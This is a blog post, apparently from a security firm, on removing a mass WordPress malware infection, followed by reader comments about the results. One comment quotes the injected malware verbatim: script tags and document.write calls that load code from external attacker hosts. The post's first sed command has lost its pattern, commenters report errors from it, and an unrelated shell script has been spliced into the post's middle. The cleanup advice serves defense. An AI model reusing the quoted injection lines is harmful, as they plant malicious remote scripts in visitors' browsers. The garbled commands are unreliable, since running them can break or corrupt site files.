If your site got hacked in the latest mass infection of WordPress sites, we have a simple solution to clean it up.
For Network Solutions users:
If your site is at Network Solutions, and you have that “virtual-ad.org” malware, the solution is simple.
Log in via FTP and remove the file cgi-bin/php.ini. That’s all you need to do to protect your users.
You will still have some “.nts” files in there (which you can remove later), but they will not be executed without the php.ini.
Via SSH:
If you have SSH access to your server, run the following commands in your web root:
$ find ./ -name "*.php" -type f | xargs sed -i 's###g' 2>&1
$ find ./ -name "*.php" -type f | xargs sed -i '/./,$!d' 2>&1
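The second sed expression above ('/./,$!d') deletes blank lines at the top of each PHP file, and the UPDATE further down says leftover blank lines mean the cleanup did not finish. The following shell script is an added example, not part of Sucuri's cleanup script, and its function names are hypothetical. It lists the PHP files that still start with a blank line and fixes only those, keeping a backup of each. It goes slightly beyond the original command by also treating whitespace-only and CRLF lines as blank, and it assumes a sed that supports -i with a suffix (GNU or BSD).

```shell
#!/bin/sh
# Added example, not Sucuri's cleanup script. Helper names are hypothetical.

# Print every non-empty *.php file under $1 whose first line holds only
# whitespace (including a lone CR from CRLF files, which '/./' treats as text).
list_leading_blank() {
    find "$1" -type f -name '*.php' | sort | while IFS= read -r f; do
        if [ -s "$f" ] && ! head -n 1 "$f" | grep -q '[^[:space:]]'; then
            printf '%s\n' "$f"
        fi
    done
}

# Strip leading whitespace-only lines from the flagged files only,
# keeping the original next to each one as FILE.bak.
strip_leading_blank() {
    list_leading_blank "$1" | while IFS= read -r f; do
        sed -i.bak '/[^[:space:]]/,$!d' "$f"
    done
}

# Constructed sample tree: one clean file, one with blank lines left behind
# by an interrupted cleanup, one with a CRLF blank line.
demo() {
    d=$(mktemp -d)
    printf '<?php echo 1;\n' > "$d/clean.php"
    printf '\n\n<?php echo 2;\n' > "$d/blank.php"
    printf '\r\n<?php echo 3;\r\n' > "$d/crlf.php"
    echo "before:"; list_leading_blank "$d"
    strip_leading_blank "$d"
    echo "after:";  list_leading_blank "$d"
    rm -rf "$d"
}
demo
```

Run list_leading_blank on the web root first to see what would change. Delete the .bak files once the site is confirmed working, since backup copies left in the web root can be served as plain text.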
Via web:
If you don’t have SSH access, download this file to your desktop:
http://sucuri.net/malware/helpers/wordpress-fix_php.txt and rename it to wordpress-fix.php.
After that, upload it to your site via FTP, and run it (using your browser) as: http://yoursite.com/wordpress-fix.php
This script will take a few minutes to complete, but will scan your whole site and remove the malware entries.
Once you are done, go back to your site and remove this file.
That’s it and you should be clean again.
UPDATE: If your site is not getting cleaned up after you run it (or you are getting extra empty lines at the top of your files), it means that the script didn’t finish running properly. Try running it again. If that doesn’t help, upload it to some subdirectories (like wp-admin, wp-content and wp-includes) and run it directly from there. For example:
http://yoursite.com/wp-admin/wordpress-fix.php , http://yoursite.com/wp-content/wordpress-fix.php , etc.
That should fix it!
As always, if you are having difficulties getting your site cleaned up, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites cleaned up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if they ever get infected with malware, hacked or blacklisted.
Hello Guys,
I am also a victim. My suggestion is that if you are using any plugins like a JavaScript and CSS optimizer, then remove it. It's an RFI attack. Hope you all be happy with this. The attacker first distributes a free program (open source) which works fine, but he puts a security hole in it for later use. He wins our faith and then attacks.
Thank you so much!
If you are on Media Temple, I had 5 blogs, found WordPress templates infected. I suspect my laptop was the first victim via malware, although not sure. Cleaned that up. Then used script from here. Cleaned it each time, but every day I would see somehow the hackers had reuploaded new exploit-laden akismet plugins onto the server. My latest discovery was that in the folder etc if you log in using FTP, they infected my php.ini file. You need to remove the last line on that file and then delete the sample.php.ini file which hosted malware. Now all clean again, but waiting for a few days to see if they come back (wish me luck!)
Thank you so much for the Quick Fix! So far everything looks good but will keep an eye on it.
I run this script and I find that I get an error:
-bash: : command not found
running this:
$ find ./ -name "*.php" -type f | xargs sed -i 's###g' 2>&1
My WP was hacked on Bluehost (3 sites). I ran the script but still see suspicious JavaScript in my footer when I view the page source in the browser. You can see at internetincomeformula.com. I have viewed the theme editor in the admin looking for this code in the footer. It is nowhere to be found. But when I view the page source code in my browser I can see this JavaScript. How do I remove it?
I ran this on 5 WP sites, only to then find them all white-screened. I was able to find the malicious code on a couple of them, but it's not showing up on one in particular. If anyone has any suggestions, they would be much appreciated.
Seems like everyone has got it to work but I am having so many problems. I keep getting a 404 or
Warning: Unexpected character in input: ” (ASCII=92) state=1
Parse error: syntax error, unexpected T_STRING
Appreciate any help
good, but if you have installed nextgenGallery remove the plug-in code that is used instead.
make sure that your plug-ins do not use encode_64 before making this operation
All my PHP files were infected by:
All my HTML files were infected by:
<script src =http:// rubydistributions. com/imgs/cardgood .php >
All my “js” files were infected by:
document.write(‘<script src =http:// rustytolin. com/images/gifimg. php >’);
document.write(‘<script src = http:// rubydistributions. com /imgs/cardgood . php >’);
It was only the one attack and so many kind of files were infected.
Also, the malware created infected files "robots.php" and gifimg.php in the "images" category of the website.
Please help me perform this step:
If you don’t have SSH access, download this file to your desktop: http://sucuri.net/malware/helpers/wordpress-fix_p... and rename it to wordpress-fix.php.
How do you download a 'text' file to your desktop? Thanks.
I used it on my main domain and then some sub directories and got two different results. I'm assuming one means it ran and was ok, then the other means it found something and cleaned it up. Is that right? I'm pasting them below.
1. Site remediated by Sucuri
This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1
If you need help, contact support@sucuri.net or visit us at Sucuri.net
Site remediated by Sucuri
This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1
If you need help, contact support@sucuri.net or visit us at Sucuri.net
2. Site remediated by Sucuri
This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1
If you need help, contact support@sucuri.net or visit us at Sucuri.net
Malware removed.
Empty lines removed.
Completed.
This worked for me but I had to run it several times and place it in my wp-admin directory on some of my blogs. Of 11 WP blogs, only the one at the root had to be run repeatedly. Also, I found a file, wtm.php that had nothing but the malicious code. I blew that one away manually.
Since this is the third time I’ve been infected, my question now is how do I protect my blogs? Is there any way to make WordPress secure? My WP is updated, I’ve placed recommended in my htaccess file and placed that file in each of my wp-admin directories. Is there anything else I can do? I really don’t have time to do this every few days and I don’t have the money to hire someone else to do it for me.
Any ideas on how to secure WP?
When I run the command from ssh I get:
-bash: 1$: ambiguous redirect
-bash: : command not found